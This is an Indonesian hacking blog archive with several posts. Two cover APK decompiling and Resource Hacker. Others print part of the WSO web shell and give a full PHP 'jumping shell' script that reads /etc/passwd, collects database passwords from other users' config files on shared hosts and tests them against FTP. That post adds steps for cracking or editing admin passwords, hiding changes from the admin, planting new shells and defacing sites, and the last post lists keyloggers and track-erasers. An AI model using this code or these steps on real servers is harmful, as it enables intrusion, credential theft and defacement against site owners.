.
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Senin, 18 November 2013

Decompile APK, Melihat Source Code Aplikasi Android dari Google Play

Decompile APK, Melihat Source Code Aplikasi Android di Google Play bisa dimanfaatkan untuk melihat kode program dari Aplikasi Android yang sudah dalam bentuk APK. Sebenarnya judul diatas terlalu "berani" hehe, karena sebenarnya tidak semua APK dapat dilihat semua bagian source codenya. Dan sepertinya ada cara untuk mengakali agar APK tidak dapat dicompile karena penulis pernah membuktikan sendiri beberapa buah Aplikasi Komersial dari Google Play tidak dapat di-decompile menggunakan decompiler apktool ataupun dex2jar. Atau hasil Kode Programnya berantakan

Pertama yang kita butuhkan tentu saja file APK dari Aplikasi Android yang bisa saja telah terinstall di Perangkat Handhone / Tablet kita.
 
Nah selanjutnya yang kita butuhkan adalah software apktool untuk mengekstrak file resources, gambar dan xml. Kemudian kita butuhkan juga aplikasi dex2jar untuk mendecompile file dex menjadi jar. Terakhir kita butuhkan aplikasi jd2_gui yaitu aplikasi pembaca source code dari file jar.

Download android-apktool dapat didownload disini. Kemudian dex2jar dapat didownload disini dan jd2_gui dapat diunduh disini.

Langkah pertama buat folder dengan nama decompiler, misalnya di D:\decompiler. Kemudian di dalamnya buat direktori apktool, dex2jar, jd2_gui, package dan result seperti ini :



Setelah itu ekstrak dan masukkan program yang anda telah download, yaitu android-apktool di folder D:\decompiler\apktool :


Kemudian dex2jar di direktori D:\decompiler\dex2jar :


Kemudian jd2_gui di folder D:\decompiler\jd2_gui


Untuk mempraktekkan cara decompile APK kita gunakan APK sebagai conroh Android Camera Intent  Masukkan AndroidCameraIntent.apk di folder package :


Setelah itu buka DOS Prompt dengan cara klik Start-Run, kemudian ketikkan :

 cd \

 D:

 cd decompiler\apktool

 apktool.bat d D:\decompiler\package\AndroidCameraIntent.apk D:\decompiler\result\AndroidCameraIntent

Hasilnya :


Setelah itu ketikkan :

 cd D:\decompiler\dex2jar

 dex2jar.bat D:\decompiler\package\AndroidCameraIntent.apk

Jika terjadi error seperti ini, sepertinya RAM anda kurang besar :

Error occurred during initialization of VM
Could not reserve enough space for object heap

Maka buka file D:\decompiler\dex2jar\dex2jar.bat dengan Notepad kemudian edit pada baris berikut ini :
...
java -Xms512m -Xmx1024m -cp "%CLASSPATH%" "com.googlecode.dex2jar.v3.Main" %*
...

Menjadi :
...
java -Xms256m -Xmx512m -cp "%CLASSPATH%" "com.googlecode.dex2jar.v3.Main" %*
...
Kemudian simpan dan tutup, ulangi perintah berikut ini di DOS Prompt :

 dex2jar.bat D:\decompiler\package\AndroidCameraIntent.apk

Seharusnya hasilnya :

Terakhir hasil dari decompile dapat dilihat menggunakan Aplikasi jd2_gui, klik Open, buka file D:\decompiler\package\AndroidCameraIntent_dex2jar.jar Hasilnya :

Sedangkan file resources gambar dan xml dapat dilihat di direktori D:\decompiler\result\AndroidCameraIntent

Silakan digunakan untuk belajar dengan baik, jangan membajak karya orang lain, cukup pelajari tekniknya dan kita buat aplikasi sendiri sesuai ide dan kreatifitas kita.

File-file tool yang dibutuhkan dan contoh APK maupun hasil decompile dapat didownload disini.

 Semoga menyenangkan ^_^

Sabtu, 16 November 2013

Cara Mengetahui Source Code Program/Aplikasi

Cara Mengetahui Source Code Program/Aplikasi - Kali ini PC Dokter akan membahas tentang bagaimana Cara Mengetahui Source Code Program/Aplikasi. Apakah agan agan yang disini ingin membuat sebuah progam yang setara dengan progam kelas tinggi. Gampang sob.. tinggal pake aja Resource Hacker. Aplikasi untuk megetahui source code sebuah program.

Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare  yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

Nah 3 itu merupakan pokok penting dari Resource Hacker.
Kita ketahui dan kita pikir ? jika kita bisa membuka source dari software, berarti kita bisa membuat software itu juga  hehehe.
Berbanggala anda pada diri anda sendiri.
Ini saya kasih SnapShot nya

Gambar di atas, saya lagi mau membuka source dari PhotoScape.

Setelah saya buka, dan saya buka table dialog, maka saya dapat kode sama tampilan nya seperti apa ? lihat gambar di bawah ini.

Okay mantap bukan ?? :-bd
Wuzup dah hehe, bagi kalian yang mau atau berminat ?
Silakan di download DISINI

Download dan buka langsung aja.
Pelajari sendiri bagaimana cara pakai nya, biar anda bisa menjadi seorang master  hehe.

Rabu, 21 November 2012

Penjelasan Shell JU4RA

Sebelumnya saya minta maaf lupa share pengunaan shell pada post Berbagi Source Code Shell JU4RA
shell ini menggunakan akses login pribadi, untuk passwordnya silahkan di edit source ini
<?php
/* WSO 2.1 (Web Shell by oRb) */
$auth_pass = "2dc10f675cf85ae073e2cdd816d5499e";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
 header('HTTP/1.0 404 Not Found');
 exit;
}
yang berwarna hijau itu encrypt passwordnya standartnya ju4ra
kalo mau edit silahkan decrypt password anda sendiri, source tipe passwordnya
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
 if( empty( $auth_pass ) ||
  ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else 

untuk loginnya tersembunyi, bisa dicek digambar dibawah ini


monggo dinikmati

Sabtu, 17 November 2012

[TUTORIAL] Simple Jumping Shell

ambil dari yang saya share di YF hehehehe

Hehehe Maaf Pertama Kali Sharing Tutorial, kalo uda ngerti mav ya ,, sharing aja
Ni sistemnya cm scanning Dir website yang satu hosting dengan shell yang kita punya ( ga semuanya shell berhasil )
biasanya kalo open read /etc/passwd terbuka seperti dibawah kadang bisa discan
CODE: SELECT ALL
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync

1. siapkan shell yang kamu punya
Image

2. upload scan.php
Image
CODE: SELECT ALL
    <?php
    echo "<html>";
    echo "<title>JU4RA | CYBER Forum Yogyafree Keren Yach</title><body>";

    set_time_limit(0);
    ##################
    @$passwd=fopen('/etc/passwd','r');
    if (!$passwd) {
    echo "[-] Error : coudn't read /etc/passwd";
    exit;
    }
    $path_to_public=array();
    $users=array();
    $pathtoconf=array();
    $i=0;

    while(!feof($passwd)) {
    $str=fgets($passwd);
    if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
    if (is_readable($dirz)) {
    array_push($users,$username);
    array_push($path_to_public,$dirz);
    }
    }
    }
    $i++;
    }
    ###################

    #########################
    echo "<br><br>";
    echo "<textarea name='main_window' cols=100 rows=20>";

    echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
    echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

    echo "[~] Searching for passwords in config.* files...\n\n";
    foreach ($users as $user) {
    $path="/home/$user/public_html/";
    read_dir($path,$user);
    }

    echo "\n[+] Done\n";

    function read_dir($path,$username) {
    if ($handle = opendir($path)) {
    while (false !== ($file = readdir($handle))) {
    $fpath="$path$file";
    if (($file!='.') and ($file!='..')) {
    if (is_readable($fpath)) {
    $dr="$fpath/";
    if (is_dir($dr)) {
    read_dir($dr,$username);
    }
    else {
    if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='db_connect.php')) {
    $pass=get_pass($fpath);
    if ($pass!='') {
    echo "[+] $fpath\n$pass\n";
    ftp_check($username,$pass);
    }
    }
    }
    }
    }
    }
    }
    }

    function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
    $line=fgets($config);
    if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
    if (strrpos($line,'"'))
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
    else
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
    return $pass;
    }
    }
    }

    function ftp_check($login,$pass) {
    @$ftp=ftp_connect('127.0.0.1');
    if ($ftp) {
    @$res=ftp_login($ftp,$login,$pass);
    if ($res) {
    echo '[FTP] '.$login.':'.$pass."  Success\n";
    }
    else ftp_quit($ftp);
    }
    }

    echo "</textarea><br>";

    echo "</body></html>";
    ?>

3. Buka file scan.php msl: http://targer.com/scan.php
tunggu beberapa saat, emang agak lama
Image

4. Buka shell kamu copykan hasil scannan tadi ke change dir shell kamu ato masukkan dir config ke read file
Image

5. Setelah dapat login Sql dbnya ,, crack dah passwordnya ,, kalo ga bisa di crack edit aja ,,
asal jangan lupa ntar dikembalikan kesemula ,, biar admin ga tau ,,

6. Setelah itu login di admin page webnya

7. upload dah shell baru ,, ato deface ,,

maaf kalo kurang jelas ato repost ,, 
Thankz for All 

9 Aplikasi Hacking Untuk Mencari Dan Menghilangkan Jejak


Memang sangat menarik jika kita membicarakan tentang dunia hacker. Hacker biasanya identik dengan kejahatan dunia maya. Walaupun jika dicari kebenarannya tidak selalu begitu. Persepsi kebanyakan orang awam terhadap hacker sendiri adalah orang yang memiliki kemampuan yang tinggi tentang komputerisasi dan menggunakannya untuk kejahatan. Namun sesungguhnya, setiap orang bisa saja menjadi seorang hacker dan disebut demikian. Hanya cukup mendownload dan menggunakan aplikasi hacker, kamu sudah bisa dibilang seorang hacker, walaupun bisa dibilang masih pemula. Nah, berikut 9 aplikasi hacker yang bisa kamu gunakan untuk mencari dan menghapus jejak. 

Sebelum kamu menggunakan aplikasi-aplikasi ini, saya tidak bertanggung jawab atas kerusakan system atau tuntutan hukum yang akan kamu terima karena menggunakan aplikasi ini. Saya nulis artikel ini cuma pengen bagi-bagi doang. Jadi sebaiknya kamu mikir-mikir dulu sebelum menggunakannya. Namun jika kamu berniat menjadi hacker sejati, kamu pasti tidak akan menghiraukan peringatan saya ini. Lakukan apapun yang ingin kamu lakukan~!

1. Armor Tools








Dengan tampilan Interface yang sangat sederhana dan user friendly, kamu bisa menghandalakan aplikasi ini untuk menghapus jejak apapun. Kamu juga bisa menghapus file yang menurut kamu sangat penting hingga tak bisa direstor kembali.

2. Actual Spy  
Aplikasi yang satu ini bisa kamu gunakan untuk mencatat hampir segala kegiatan mulai dari, Screen Shots, Copy-Paste,  document yang dicetak dan sebagainya. Segala kegiatan yang dilakukan user akan dicatat pada sebuah file log yang tentunya di-enkripsi sebelumnya, dan tentunya hanya kamu saja yang bisa melihatnya.
 


3. Elsave
Kelemahan aplikasi ini adalah hanya bisa dijalankan dengan command prompt. Namun aplikasi ini tidak kalah tangguhnya  dalam hal menghilangkan jejak. Yang lebih canggih lagi, kamu bisa menghapus event log kamu dengan remote.
4. Handy Keyloger

Mungkin ini adalah salah satu aplikasi yang cukup terkenal di dunia hacker. Selain tampilan interface yang sangat user friendly, aplikasi ini dapat menyembunyikan dirinya dari task manager. Aplikasi ini dapat mencatat dan mereka semua aktifitas seperti, ketikan keyboard, situs web yang dikunjungi, copy- paste dan lain sebagainya.
 




5. Spy Keylogger
Sama seperti keylogger lainnya, aplikasi ini dapat mecatat semua aktifitas. Ukurannya sangat kecil. Tidak banyak fitur yang dimiliki oleh aplikasi ini.
6. PrivacyKeyboard
Aplikasi ini agak bertentangan. Sebenarnya aplikasi ini berguna untuk mencegah keylogger berjalan di komputer kamu. Jika applikasi ini aktif, user lain  tidak akan dapat melakukan aktifitas seperti, screen shots atau sebagainya. 
7. Spytech SpyAgent
Sudah ketahuan dari namanya. Aplikasi ini bisa kamu handalkan sebagai mata-mata. Semua kegiatan bisa dicatat dan tentunya file lognya akan dienkripsi dulu. Untuk Menjalankan aplikasi ini kamu bisa menggunakan hot key yang kamu inginkan.
8. Traceless
Kamu bisa menghandalkan aplikasi ini untuk menghilangkan jejak, misalkan membersihkan history, temporary internet files dan sebagainya. Tampilannya sangat sederhana, begitu juga fungsinya. Tak banyak yang bisa kita handalkan dari aplikasi ini. Kamu bisa menjalankan aplikasi ini lewat command prompt.
9. Track Eraser Pro
Inilah salah satu aplikasi yang benar-benar bisa kamu handalkan dalam hal menghapus jejak. Selain dapat menghapus history pada windows, aplikasi ini juga bisa menghapus history pada aplikasi yang terinstal misalkan, Winamp, Office, Winzip dan lainnya.

Okey, itulah dia 9 tools hacking yang mungkin bisa kamu coba. Namun, sebelum mencobanya, sebaiknya kamu back up dulu system kamu. Segala kerusakan yang system kamu alami, saya tidak akan bertanggung jawab. Maaf kalo saya tidak mencantumkan link untuk download. Semoga bermanfaat.